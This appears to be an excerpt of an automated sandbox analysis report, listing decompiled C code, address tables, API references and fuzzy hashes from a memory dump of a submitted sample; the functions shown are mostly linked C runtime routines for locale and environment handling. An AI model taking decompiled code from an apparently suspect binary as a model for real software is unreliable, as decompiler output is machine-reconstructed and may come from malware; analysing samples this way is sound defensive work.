                                                          0x009b7be0
                                                          0x009b7b27
                                                          0x009b7b27
                                                          0x009b7b2b
                                                          0x009b7b35
                                                          0x009b7b3c
                                                          0x009b7b3e
                                                          0x009b7b40
                                                          0x009b7b40
                                                          0x009b7b3e
                                                          0x009b7b4c
                                                          0x009b7b52
                                                          0x009b7b59
                                                          0x009b7b5e
                                                          0x009b7b64
                                                          0x009b7b6c
                                                          0x009b7b70
                                                          0x009b7b72
                                                          0x009b7b79
                                                          0x009b7b83
                                                          0x009b7b8a
                                                          0x009b7b90
                                                          0x009b7b96
                                                          0x009b7b9b
                                                          0x009b7ba1
                                                          0x009b7ba6
                                                          0x009b7ba9
                                                          0x009b7ba9
                                                          0x009b7b79
                                                          0x009b7bae
                                                          0x009b7bb2
                                                          0x009b7bb2
                                                          0x009b7b21
                                                          0x009b7be7
                                                          0x009b7bee
                                                          0x009b7bf3
                                                          0x009b7aa0
                                                          0x009b7aa5
                                                          0x009b7aab
                                                          0x009b7ab0
                                                          0x009b7ab0
                                                          0x009b7bfa
                                                          0x009b7bfa
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
                                                          • String ID:
                                                          • API String ID: 2762079118-0
                                                          • Opcode ID: da5503bce7a389e2851da6700a825f1d062d8528cc12023aea641eb43bb90b57
                                                          • Instruction ID: 2b4a53e4bd333c76b9562a8cfe9133d025f0b7c5dce6ab881c47875f43153c8e
                                                          • Opcode Fuzzy Hash: da5503bce7a389e2851da6700a825f1d062d8528cc12023aea641eb43bb90b57
                                                          • Instruction Fuzzy Hash: E141D132908309AFDB10AFE4DA42BDDB7E8EFC4334F10862DF91596182DB759641EB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A513D Relevance: 18.1, APIs: 12, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E009A513D(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr _t8;
				void* _t13;
				void* _t23;
				intOrPtr* _t25;
				signed int _t26;
				signed int _t27;
				intOrPtr _t40;

				_t13 = __ebx;
				__imp__DecodePointer( *0x9d0110);
				_t25 =  *0x9cf20c; // 0x471f28
				_t23 = __eax;
				if(_t25 == 0) {
					L5:
					_push(_t13);
					E009B2248(_t25);
					_t26 =  *0x9cf208; // 0x0
					 *0x9cf20c = 0;
					if(_t26 == 0) {
						L9:
						E009B2248(_t26);
						 *0x9cf208 = 0;
						E009B2248( *0x9cf204);
						_t5 = E009B2248( *0x9cf200);
						_t27 = _t26 | 0xffffffff;
						 *0x9cf204 = 0;
						 *0x9cf200 = 0;
						if(_t23 != _t27) {
							_t40 =  *0x9d0110; // 0x6986dcdf
							if(_t40 != 0) {
								_t5 = E009B2248(_t23);
							}
						}
						__imp__EncodePointer(_t27);
						 *0x9d0110 = _t5;
						_t6 =  *0x9cfd10; // 0x0
						if(_t6 != 0) {
							E009B2248(_t6);
							 *0x9cfd10 = 0;
						}
						_t7 =  *0x9cfd14; // 0x0
						if(_t7 != 0) {
							E009B2248(_t7);
							 *0x9cfd14 = 0;
						}
						_t8 =  *0x9cecec; // 0x471778
						asm("lock xadd [eax], esi");
						if(_t27 == 1) {
							_t8 =  *0x9cecec; // 0x471778
							if(_t8 != 0x9ceac8) {
								_t8 = E009B2248(_t8);
								 *0x9cecec = 0x9ceac8;
							}
						}
						return _t8;
					}
					while( *_t26 != 0) {
						E009B2248( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x9cf208; // 0x0
					goto L9;
				} else {
					while( *_t25 != 0) {
						E009B2248( *_t25);
						_t25 = _t25 + 4;
						if(_t25 != 0) {
							continue;
						}
						break;
					}
					_t25 =  *0x9cf20c; // 0x471f28
					goto L5;
				}
			}













                                                          0x009a513d
                                                          0x009b091b
                                                          0x009b0921
                                                          0x009b0927
                                                          0x009b092b
                                                          0x009b0945
                                                          0x009b0945
                                                          0x009b0947
                                                          0x009b094c
                                                          0x009b0954
                                                          0x009b095d
                                                          0x009b0976
                                                          0x009b0977
                                                          0x009b0982
                                                          0x009b0988
                                                          0x009b0993
                                                          0x009b0998
                                                          0x009b099b
                                                          0x009b09a4
                                                          0x009b09ac
                                                          0x009b09ae
                                                          0x009b09b4
                                                          0x009b09b7
                                                          0x009b09bc
                                                          0x009b09b4
                                                          0x009b09be
                                                          0x009b09c4
                                                          0x009b09c9
                                                          0x009b09d0
                                                          0x009b09d3
                                                          0x009b09d9
                                                          0x009b09d9
                                                          0x009b09df
                                                          0x009b09e6
                                                          0x009b09e9
                                                          0x009b09ef
                                                          0x009b09ef
                                                          0x009b09f5
                                                          0x009b09fa
                                                          0x009b0a00
                                                          0x009b0a02
                                                          0x009b0a0e
                                                          0x009b0a11
                                                          0x009b0a17
                                                          0x009b0a17
                                                          0x009b0a0e
                                                          0x009b0a1f
                                                          0x009b0a1f
                                                          0x009b095f
                                                          0x009b0965
                                                          0x009b096b
                                                          0x009b096e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009b096e
                                                          0x009b0970
                                                          0x00000000
                                                          0x009b092d
                                                          0x009b092d
                                                          0x009b0934
                                                          0x009b093a
                                                          0x009b093d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009b093d
                                                          0x009b093f
                                                          0x00000000
                                                          0x009b093f

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 3064303923-0
                                                          • Opcode ID: 74ccf8ab6e0153cd3e75a333bd0dd067a2f7325259ecf5a7f5418adf0dd7ded3
                                                          • Instruction ID: 3cdadf9e88027997c62150ad835ac5599d8a008d718cf249fdcea32ed51fca6b
                                                          • Opcode Fuzzy Hash: 74ccf8ab6e0153cd3e75a333bd0dd067a2f7325259ecf5a7f5418adf0dd7ded3
                                                          • Instruction Fuzzy Hash: AD21B137D692118BE725AF14FE50E9A7369F781730354063EF93493275CB346C40AB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A5649 Relevance: 10.6, APIs: 7, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 75%
                                                          			E009A5649(intOrPtr* __eax, short __ebx, void* __ecx, void* __edx, intOrPtr* __esi) {
				void* _t45;
				signed int _t47;
				intOrPtr* _t51;
				void* _t59;
				signed short _t60;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t71;
				void* _t78;
				void* _t80;
				void* _t95;
				intOrPtr* _t98;
				void* _t99;
				signed int _t100;
				void* _t102;
				void* _t103;
				void* _t106;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t123;

				_t97 = __esi;
				_t93 = __edx;
				_t79 = __ebx;
				asm("adc eax, [ecx+0x682af3]");
				 *((intOrPtr*)(__ecx + 0x5be9f3)) =  *((intOrPtr*)(__ecx + 0x5be9f3)) + __eax;
				 *((intOrPtr*)(__ecx + 0xa881e9)) =  *((intOrPtr*)(__ecx + 0xa881e9)) + __eax;
				 *((intOrPtr*)(__ecx - 0x7f)) =  *((intOrPtr*)(__ecx - 0x7f)) + __ecx;
				 *__eax =  *__eax + __eax;
				_t103 = _t102 + 0xc;
				if(__eax == 0) {
					if(E009BA06A(__esi) == 0) {
						if(E009B5727( *((intOrPtr*)(_t100 - 0x1e8)), 0x55, __ebx, E009B5609(__ebx) + 1) != 0) {
							goto L28;
						} else {
							goto L2;
						}
					} else {
						_t59 = E009B9FDB(__esi, 0x20001004, _t100 - 0x1dc, 2);
						_t106 = _t103 + 0x10;
						if(_t59 == 0) {
							L11:
							_t60 = GetACP();
							 *(_t100 - 0x1dc) = _t60;
						} else {
							_t60 =  *(_t100 - 0x1dc);
							if(_t60 == 0) {
								goto L11;
							}
						}
						 *_t94 = _t60 & 0x0000ffff;
						_t94 =  *((intOrPtr*)(_t100 - 0x1e4)) + 1;
						_t62 = E009B5727( *((intOrPtr*)(_t100 - 0x1d4)), 0x83, _t97,  *((intOrPtr*)(_t100 - 0x1e4)) + 1);
						_t107 = _t106 + 0x10;
						if(_t62 != 0) {
							goto L28;
						} else {
							_t63 = E009B5727(_t79,  *((intOrPtr*)(_t100 + 0x18)), _t97, _t94);
							_t108 = _t107 + 0x10;
							if(_t63 != 0) {
								goto L28;
							} else {
								_t64 = E009B5727( *((intOrPtr*)(_t100 - 0x1e8)), 0x55, _t97, _t94);
								_t109 = _t108 + 0x10;
								if(_t64 != 0) {
									goto L28;
								} else {
									_t94 = 0x83;
									goto L16;
								}
							}
						}
					}
				} else {
					_t94 = 0x83;
					_push(_t100 - 0x1d0);
					E009B7294(__ebx, __ecx, __edx, 0x83, _t123,  *((intOrPtr*)(_t100 - 0x1d4)), 0x83);
					_t109 = _t103 + 0xc;
					if(__ebx == 0) {
						L16:
						_t79 = 0;
						if( *_t97 == 0) {
							L20:
							 *((short*)( *((intOrPtr*)(_t100 - 0x1e0)))) = 0;
							goto L21;
						} else {
							_t69 =  *((intOrPtr*)(_t100 - 0x1e4));
							if( *((intOrPtr*)(_t100 - 0x1e4)) >= _t94) {
								goto L20;
							} else {
								_t71 = E009B5727( *((intOrPtr*)(_t100 - 0x1e0)), _t94, _t97, _t69 + 1);
								_t109 = _t109 + 0x10;
								if(_t71 == 0) {
									L21:
									_t94 =  *(_t100 - 0x1f0);
									if(_t94 != 0) {
										E009B32E0(_t94,  *((intOrPtr*)(_t100 - 0x1d8)), 4);
										_t109 = _t109 + 0xc;
									}
									_t79 =  *((intOrPtr*)(_t100 - 0x1d4));
									_t97 =  *((intOrPtr*)(_t100 - 0x1ec));
									if(E009B55AD( *((intOrPtr*)(_t100 - 0x1ec)),  *((intOrPtr*)(_t100 + 0x10)),  *((intOrPtr*)(_t100 - 0x1d4))) != 0) {
										goto L28;
									} else {
										L2:
										_pop(_t95);
										_pop(_t99);
										_pop(_t80);
										return E009B1E0D(_t80,  *(_t100 - 4) ^ _t100, _t93, _t95, _t99);
									}
								} else {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									goto L29;
								}
							}
						}
					} else {
						_t78 = E009B5727(__ebx,  *((intOrPtr*)(_t100 + 0x18)), _t100 - 0xb0, E009B5609(_t100 - 0xb0) + 1);
						_t109 = _t109 + 0x14;
						if(_t78 == 0) {
							goto L16;
						} else {
							L28:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							L29:
							E009AEB49(_t79, _t93);
							asm("int3");
							_push(8);
							_push(0x9cc538);
							_t45 = E009AF1E0(_t79, _t94, _t97);
							_t98 =  *((intOrPtr*)(_t100 + 8));
							if(_t98 != 0) {
								_t47 = E009B20A9(0xd);
								 *(_t100 - 4) =  *(_t100 - 4) & 0x00000000;
								if( *((intOrPtr*)(_t98 + 4)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t47 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t98 + 4)) != 0x9ceac8) {
										E009B2248( *((intOrPtr*)(_t98 + 4)));
									}
								}
								 *(_t100 - 4) = 0xfffffffe;
								E009B78AF();
								if( *_t98 != 0) {
									E009B20A9(0xc);
									 *(_t100 - 4) = 1;
									E009B4248( *_t98);
									_t51 =  *_t98;
									if(_t51 != 0 &&  *_t51 == 0 && _t51 != 0x9ce800) {
										E009B40EE(_t51);
									}
									 *(_t100 - 4) = 0xfffffffe;
									E009B78BB();
								}
								_t45 = E009B2248(_t98);
							}
							return E009AF225(_t45);
						}
					}
				}
			}

























                                                          0x009a5649
                                                          0x009a5649
                                                          0x009a5649
                                                          0x009a5649
                                                          0x009a564f
                                                          0x009a5655
                                                          0x009a565b
                                                          0x009b7661
                                                          0x009b766a
                                                          0x009b766f
                                                          0x009b76d1
                                                          0x009b77f9
                                                          0x00000000
                                                          0x009b77fb
                                                          0x00000000
                                                          0x009b7579
                                                          0x009b76d7
                                                          0x009b76e6
                                                          0x009b76eb
                                                          0x009b76f0
                                                          0x009b76fc
                                                          0x009b76fc
                                                          0x009b7702
                                                          0x009b76f2
                                                          0x009b76f2
                                                          0x009b76fa
                                                          0x00000000
                                                          0x00000000
                                                          0x009b76fa
                                                          0x009b770b
                                                          0x009b7713
                                                          0x009b7721
                                                          0x009b7726
                                                          0x009b772b
                                                          0x00000000
                                                          0x009b7731
                                                          0x009b7737
                                                          0x009b773c
                                                          0x009b7741
                                                          0x00000000
                                                          0x009b7747
                                                          0x009b7751
                                                          0x009b7756
                                                          0x009b775b
                                                          0x00000000
                                                          0x009b7761
                                                          0x009b7761
                                                          0x00000000
                                                          0x009b7761
                                                          0x009b775b
                                                          0x009b7741
                                                          0x009b772b
                                                          0x009b7671
                                                          0x009b7677
                                                          0x009b767c
                                                          0x009b7684
                                                          0x009b7689
                                                          0x009b768e
                                                          0x009b7766
                                                          0x009b7766
                                                          0x009b776b
                                                          0x009b7794
                                                          0x009b779c
                                                          0x00000000
                                                          0x009b776d
                                                          0x009b776d
                                                          0x009b7775
                                                          0x00000000
                                                          0x009b7777
                                                          0x009b7781
                                                          0x009b7786
                                                          0x009b778b
                                                          0x009b779f
                                                          0x009b779f
                                                          0x009b77a7
                                                          0x009b77b2
                                                          0x009b77b7
                                                          0x009b77b7
                                                          0x009b77ba
                                                          0x009b77c0
                                                          0x009b77d5
                                                          0x00000000
                                                          0x009b77d7
                                                          0x009b757b
                                                          0x009b757e
                                                          0x009b757f
                                                          0x009b7582
                                                          0x009b758b
                                                          0x009b758b
                                                          0x009b778d
                                                          0x009b778d
                                                          0x009b778e
                                                          0x009b778f
                                                          0x009b7790
                                                          0x009b7791
                                                          0x00000000
                                                          0x009b7791
                                                          0x009b778b
                                                          0x009b7775
                                                          0x009b7694
                                                          0x009b76ad
                                                          0x009b76b2
                                                          0x009b76b7
                                                          0x00000000
                                                          0x009b76bd
                                                          0x009b7800
                                                          0x009b7802
                                                          0x009b7803
                                                          0x009b7804
                                                          0x009b7805
                                                          0x009b7806
                                                          0x009b7807
                                                          0x009b7807
                                                          0x009b780c
                                                          0x009b780d
                                                          0x009b780f
                                                          0x009b7814
                                                          0x009b7819
                                                          0x009b781e
                                                          0x009b7826
                                                          0x009b782c
                                                          0x009b7835
                                                          0x009b783a
                                                          0x009b783e
                                                          0x009b784c
                                                          0x009b7851
                                                          0x009b783e
                                                          0x009b7852
                                                          0x009b7859
                                                          0x009b7861
                                                          0x009b7865
                                                          0x009b786b
                                                          0x009b7874
                                                          0x009b787a
                                                          0x009b787e
                                                          0x009b788d
                                                          0x009b7892
                                                          0x009b7893
                                                          0x009b789a
                                                          0x009b789a
                                                          0x009b78a0
                                                          0x009b78a5
                                                          0x009b78ab
                                                          0x009b78ab
                                                          0x009b76b7
                                                          0x009b768e

                                                          APIs
                                                          • GetACP.KERNEL32(?,?,?,?,?,00000004,?,00000000), ref: 009B76FC
                                                          • _memmove.LIBCMT ref: 009B77B2
                                                          • __invoke_watson.LIBCMT ref: 009B7807
                                                          • __lock.LIBCMT ref: 009B7826
                                                          • _free.LIBCMT ref: 009B784C
                                                          • __lock.LIBCMT ref: 009B7865
                                                          • ___removelocaleref.LIBCMT ref: 009B7874
                                                          • ___freetlocinfo.LIBCMT ref: 009B788D
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4124
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4142
                                                            • Part of subcall function 009B40EE: ___free_lconv_num.LIBCMT ref: 009B414D
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4157
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4162
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4183
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4196
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B41A4
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B41AF
                                                            • Part of subcall function 009B40EE: ___free_lc_time.LIBCMT ref: 009B41CD
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B41D8
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4203
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B420A
                                                          • _free.LIBCMT ref: 009B78A0
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$__lock$___free_lc_time___free_lconv_num___freetlocinfo___removelocaleref__invoke_watson_memmove
                                                          • String ID:
                                                          • API String ID: 936943993-0
                                                          • Opcode ID: b4b7c366daa6f6ee2bd62e072f5956348ecf630baebd4094ba1a454d3a09e311
                                                          • Instruction ID: dae69ce64a2128626101bf60fecb98a9483d1b887915a57213a6b28aead9c9f5
                                                          • Opcode Fuzzy Hash: b4b7c366daa6f6ee2bd62e072f5956348ecf630baebd4094ba1a454d3a09e311
                                                          • Instruction Fuzzy Hash: 41210971509304ABDB34ABE08F8ABE9B768AFC0330F58076DF415D6092DB35CA40C751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009B12B6 Relevance: 9.1, APIs: 6, Instructions: 102COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E009B12B6(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _t14;
				signed int _t15;
				signed int _t18;
				void* _t20;
				void* _t21;
				signed short* _t22;
				signed int _t23;
				void* _t24;
				void* _t30;
				signed short* _t32;
				signed int _t34;
				void* _t35;
				signed short* _t49;
				signed int _t50;
				signed short* _t53;
				signed short* _t56;
				void* _t60;

				_t47 = __edx;
				if(_a4 != 0) {
					_push(_a24);
					_push(_a20);
					_push(_a16);
					_push(_a12);
					_push(_a8);
					_t14 = E009AEB49(__ebx, __edx);
					asm("int3");
					_push(__ebx);
					_push(__esi);
					_t53 =  *0x9cf1e4; // 0x0
					_t32 = 0;
					_push(__edi);
					_t49 = 0;
					if(_t53 != 0) {
						while(1) {
							_t15 =  *_t53 & 0x0000ffff;
							_t35 = 0x3d;
							if(_t15 == 0) {
								break;
							}
							if(_t15 != _t35) {
								_t49 = _t49 + 1;
							}
							_t53 =  &(( &(_t53[E009B5609(_t53)]))[1]);
						}
						_t9 = _t49 + 1; // 0x1
						_t14 = E009B2280(_t9, 4);
						_t50 = _t14;
						 *0x9cf20c = _t50;
						if(_t50 == 0) {
							goto L4;
						} else {
							_t56 =  *0x9cf1e4; // 0x0
							if( *_t56 == _t32) {
								L17:
								E009B2248(_t56);
								 *0x9cf1e4 = _t32;
								_t18 = 0;
								 *_t50 = _t32;
								 *0x9d0118 = 1;
								goto L18;
							} else {
								do {
									_t20 = E009B5609(_t56);
									_t10 = _t20 + 1; // 0x1
									_t34 = _t10;
									_t21 = 0x3d;
									if( *_t56 == _t21) {
										goto L15;
									} else {
										_t22 = E009B2280(_t34, 2);
										 *_t50 = _t22;
										if(_t22 == 0) {
											_t23 = E009B2248( *0x9cf20c);
											 *0x9cf20c =  *0x9cf20c & 0x00000000;
											_t18 = _t23 | 0xffffffff;
											L18:
											goto L19;
										} else {
											_t24 = E009B55AD(_t22, _t34, _t56);
											_t60 = _t60 + 0xc;
											if(_t24 != 0) {
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												E009AEB49(_t34, _t47);
												asm("int3");
												if(E009B15DF(3) == 1) {
													L25:
													E009B1415(_t34, _t47, _t50, _t56, 0xfc);
													return E009B1415(_t34, _t47, _t50, _t56, 0xff);
												}
												_t30 = E009B15DF(3);
												if(_t30 == 0 &&  *0x9cf540 == 1) {
													goto L25;
												}
												return _t30;
											} else {
												_t50 = _t50 + 4;
												goto L15;
											}
										}
									}
									goto L27;
									L15:
									_t56 =  &(_t56[_t34]);
									_t32 = 0;
								} while ( *_t56 != 0);
								_t56 =  *0x9cf1e4; // 0x0
								goto L17;
							}
						}
					} else {
						L4:
						_t18 = _t14 | 0xffffffff;
						L19:
						return _t18;
					}
				} else {
					return __eax;
				}
				L27:
			}




















                                                          0x009b12b6
                                                          0x009b12bd
                                                          0x009b12c1
                                                          0x009b12c4
                                                          0x009b12c7
                                                          0x009b12ca
                                                          0x009b12cd
                                                          0x009b12d0
                                                          0x009b12d5
                                                          0x009b12d6
                                                          0x009b12d7
                                                          0x009b12d8
                                                          0x009b12de
                                                          0x009b12e0
                                                          0x009b12e1
                                                          0x009b12e5
                                                          0x009b1302
                                                          0x009b1302
                                                          0x009b1307
                                                          0x009b130b
                                                          0x00000000
                                                          0x00000000
                                                          0x009b12f2
                                                          0x009b12f4
                                                          0x009b12f4
                                                          0x009b12ff
                                                          0x009b12ff
                                                          0x009b130d
                                                          0x009b1313
                                                          0x009b1318
                                                          0x009b131a
                                                          0x009b1324
                                                          0x00000000
                                                          0x009b1326
                                                          0x009b1326
                                                          0x009b132f
                                                          0x009b1375
                                                          0x009b1376
                                                          0x009b137b
                                                          0x009b1381
                                                          0x009b1383
                                                          0x009b1385
                                                          0x00000000
                                                          0x009b1331
                                                          0x009b1331
                                                          0x009b1332
                                                          0x009b133a
                                                          0x009b133a
                                                          0x009b133d
                                                          0x009b1341
                                                          0x00000000
                                                          0x009b1343
                                                          0x009b1346
                                                          0x009b134b
                                                          0x009b1351
                                                          0x009b139a
                                                          0x009b139f
                                                          0x009b13a6
                                                          0x009b138f
                                                          0x00000000
                                                          0x009b1353
                                                          0x009b1356
                                                          0x009b135b
                                                          0x009b1360
                                                          0x009b13ad
                                                          0x009b13ae
                                                          0x009b13af
                                                          0x009b13b0
                                                          0x009b13b1
                                                          0x009b13b2
                                                          0x009b13b7
                                                          0x009b13c3
                                                          0x009b13da
                                                          0x009b13df
                                                          0x00000000
                                                          0x009b13ef
                                                          0x009b13c7
                                                          0x009b13cf
                                                          0x00000000
                                                          0x00000000
                                                          0x009b13f0
                                                          0x009b1362
                                                          0x009b1362
                                                          0x00000000
                                                          0x009b1362
                                                          0x009b1360
                                                          0x009b1351
                                                          0x00000000
                                                          0x009b1365
                                                          0x009b1365
                                                          0x009b1368
                                                          0x009b136a
                                                          0x009b136f
                                                          0x00000000
                                                          0x009b136f
                                                          0x009b132f
                                                          0x009b12e7
                                                          0x009b12e7
                                                          0x009b12e7
                                                          0x009b1390
                                                          0x009b1393
                                                          0x009b1393
                                                          0x009b12bf
                                                          0x009b12c0
                                                          0x009b12c0
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __invoke_watson
                                                          • String ID:
                                                          • API String ID: 3648217671-0
                                                          • Opcode ID: 3269c9cf6f8446e023501b7c01c76f99297c0d2a5859649f39cf93f39aa54e11
                                                          • Instruction ID: 244d3da62b2419ffec7f2b83562d9ddaa1875d9bfdd12cecff67f453c29b3a35
                                                          • Opcode Fuzzy Hash: 3269c9cf6f8446e023501b7c01c76f99297c0d2a5859649f39cf93f39aa54e11
                                                          • Instruction Fuzzy Hash: E9212B77814202DFDB246FA0ED55BE673EEEF40370FA4442AF520D7490E73599409790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009B721D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 62%
                                                          			E009B721D(void* __ebx, void* __edi, void* __fp0, intOrPtr _a4) {
				char* _v24;
				intOrPtr _v28;
				signed int _v36;
				signed int _v40;
				short _v300;
				void* __esi;
				void* _t15;
				void* _t17;
				signed int _t20;
				char* _t22;
				signed int _t30;
				void* _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t49;
				void* _t51;
				signed int _t52;

				if(_a4 != 0) {
					_push(__ebx);
					_t30 = E009BDBB1(_a4, 0x55);
					if(_t30 < 0x55) {
						_push(__edi);
						_t15 = E009B22C8(_t40, 2 + _t30 * 2);
						_t42 = _t15;
						if(_t42 != 0) {
							_t5 = _t30 + 1; // 0x1
							_t17 = E009B5727(_t42, _t5, _a4, _t5);
							_t52 = _t51 + 0x10;
							if(_t17 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E009AEB49(_t30, _t40);
								asm("int3");
								_t49 = _t47;
								_push(_t49);
								_t50 = _t52;
								_t20 =  *0x9ce400; // 0xff4e2c36
								_v40 = _t20 ^ _t52;
								_t22 = _v24;
								_t45 = _v28;
								if(_v28 <= 5 && _t22 != 0 && MultiByteToWideChar(0, 0, _t22, 0xffffffff,  &_v300, 0x83) != 0) {
									E009B7973(_t30, _t40, __fp0, _t45,  &_v300);
								}
								_pop(_t46);
								return E009B1E0D(_t30, _v36 ^ _t50, _t40, _t42, _t46);
							} else {
								_t15 = _t42;
								goto L5;
							}
						} else {
							L5:
							goto L6;
						}
					} else {
						_t15 = 0;
						L6:
						return _t15;
					}
				} else {
					return 0;
				}
			}





















                                                          0x009b7224
                                                          0x009b722a
                                                          0x009b7235
                                                          0x009b723c
                                                          0x009b7249
                                                          0x009b724b
                                                          0x009b7250
                                                          0x009b7255
                                                          0x009b725b
                                                          0x009b7264
                                                          0x009b7269
                                                          0x009b726e
                                                          0x009b7276
                                                          0x009b7277
                                                          0x009b7278
                                                          0x009b7279
                                                          0x009b727a
                                                          0x009b727b
                                                          0x009b7280
                                                          0x009b7284
                                                          0x009b74b4
                                                          0x009b74b5
                                                          0x009b74bd
                                                          0x009b74c4
                                                          0x009b74c7
                                                          0x009b74cb
                                                          0x009b74d1
                                                          0x009b74fc
                                                          0x009b7502
                                                          0x009b750c
                                                          0x009b7515
                                                          0x009b7270
                                                          0x009b7270
                                                          0x00000000
                                                          0x009b7270
                                                          0x009b7257
                                                          0x009b7257
                                                          0x00000000
                                                          0x009b7257
                                                          0x009b723e
                                                          0x009b723e
                                                          0x009b7258
                                                          0x009b725a
                                                          0x009b725a
                                                          0x009b7226
                                                          0x009b7229
                                                          0x009b7229

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _wcsnlen
                                                          • String ID: U
                                                          • API String ID: 3628947076-3372436214
